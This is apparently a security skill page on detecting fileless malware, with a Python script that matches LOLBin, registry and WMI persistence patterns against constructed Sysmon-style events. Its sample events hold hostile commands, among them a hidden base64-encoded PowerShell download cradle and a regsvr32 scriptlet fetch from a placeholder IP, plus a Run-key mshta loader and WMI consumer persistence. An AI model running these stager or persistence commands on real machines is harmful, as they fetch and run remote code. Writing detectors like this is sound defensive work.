detecting-fileless-malware-techniques
Detecting Fileless Malware Techniques
When to Use
- EDR alerts flag unusual command lines, parent processes, or network activity from signed, trusted system binaries (PowerShell, mshta, wmic, regsvr32)
- Investigating attacks that leave no traditional malware files on disk
- Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence
- Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments
- Memory forensics reveals injected or in-memory-only malicious code with no corresponding file on disk
Do not use for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware.
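As an added, runnable example (not part of this skill's own code), the following Python detection logic runs over a handful of constructed Sysmon-style events covering the situations listed above: LOLBin command lines (including decoding a PowerShell -EncodedCommand payload so a download cradle hidden behind base64 is still caught), a registry value holding a base64-encoded payload, a Run-key loader that invokes a LOLBin, and a permanent WMI subscription (command-line consumer plus filter-to-consumer binding). The rule names, the simplified event field names and the sample telemetry are assumptions made for illustration, not real logs or vendor identifiers.

```python
"""Detection logic for common fileless techniques, run over constructed
Sysmon-style events. Added example for this skill page, not its own code.
Field names are modeled loosely on Sysmon Event IDs 1, 13 and 19-21."""
import base64
import re
from typing import Dict, List, Optional

# Rule names are labels invented for this example, not vendor or MITRE IDs.
LOLBIN_RULES = [
    ("mshta_inline_script", re.compile(r"mshta(\.exe)?\s.*?\b(vbscript|javascript|https?):", re.I)),
    ("regsvr32_scriptlet", re.compile(r"regsvr32.*\s/i:\S+.*scrobj\.dll", re.I)),
    ("rundll32_script", re.compile(r"rundll32.*\b(javascript|vbscript):", re.I)),
    ("powershell_encoded", re.compile(r"powershell.*\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", re.compile(r"\b(IEX|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I)),
    ("wmic_process_create", re.compile(r"wmic.*\bprocess\s+call\s+create\b", re.I)),
    ("certutil_decode_or_fetch", re.compile(r"certutil.*\s-(decode|urlcache)\b", re.I)),
]
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{200,}={0,2}$")  # threshold is an assumption; tune it
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -e/-enc/-EncodedCommand, or None."""
    m = re.search(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_process(event: Dict[str, str]) -> List[str]:
    """Event ID 1 (process create): match abuse patterns against the command
    line and, when present, against the decoded -EncodedCommand payload."""
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd) or ""
    hits = [name for name, rx in LOLBIN_RULES if rx.search(cmd) or rx.search(decoded)]
    # An Office parent spawning an abused LOLBin is the classic macro-to-fileless pivot.
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if hits and parent in {"winword.exe", "excel.exe", "outlook.exe"}:
        hits.append("office_parent")
    return hits


def analyze_registry(event: Dict[str, str]) -> List[str]:
    """Event ID 13 (value set): payloads parked in the registry and Run-key loaders."""
    target, data = event.get("TargetObject", ""), event.get("Details", "")
    hits = []
    if BASE64_BLOB.match(data):
        hits.append("registry_base64_payload")
    if RUN_KEY.search(target) and re.search(r"powershell|mshta|wscript|cscript|regsvr32", data, re.I):
        hits.append("runkey_lolbin_loader")
    return hits


def analyze_wmi(event: Dict[str, str]) -> List[str]:
    """Event IDs 19-21: a command-line or script consumer, and any binding of a
    consumer to a filter, is permanent WMI persistence until proven otherwise."""
    if event["EventID"] == 20 and event.get("Type", "") in {"Command Line", "Script"}:
        return ["wmi_commandline_consumer"]
    if event["EventID"] == 21:
        return ["wmi_filter_consumer_binding"]
    return []


def triage(events: List[Dict]) -> List[tuple]:
    """Dispatch each event to the handler for its ID; return (event index, rule) pairs."""
    handlers = {1: analyze_process, 13: analyze_registry, 19: analyze_wmi, 20: analyze_wmi, 21: analyze_wmi}
    return [(i, rule) for i, ev in enumerate(events)
            for rule in handlers.get(ev["EventID"], lambda e: [])(ev)]


# Constructed sample telemetry (not real logs). The encoded command is built
# here so the decoder can be checked against a known plaintext.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://192.0.2.10/p.sct scrobj.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"},  # benign control
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Classes\Blob\Payload",
     "Details": "TVqQAAMAAAAEAAAA" * 20},  # 320-char base64 blob parked in the registry
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": 'mshta.exe vbscript:Execute("MsgBox 1")'},
    {"EventID": 20, "Operation": "Created", "Name": "SysUpdater", "Type": "Command Line",
     "Destination": "powershell.exe -nop -w hidden -c Start-Sleep 1"},
    {"EventID": 21, "Operation": "Created", "Consumer": 'CommandLineEventConsumer.Name="SysUpdater"',
     "Filter": '__EventFilter.Name="SysTrigger"'},
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event[{idx}] EID {SAMPLE_EVENTS[idx]['EventID']}: {rule}")
```

Running the script lists one alert per (event, rule) pair; the svchost.exe control event produces none, and the first PowerShell event fires the download-cradle rule only because the encoded command was decoded first. In production the same functions would consume Sysmon or EDR JSON, and the base64 length threshold and the Office parent list are the first things to tune against your own baseline.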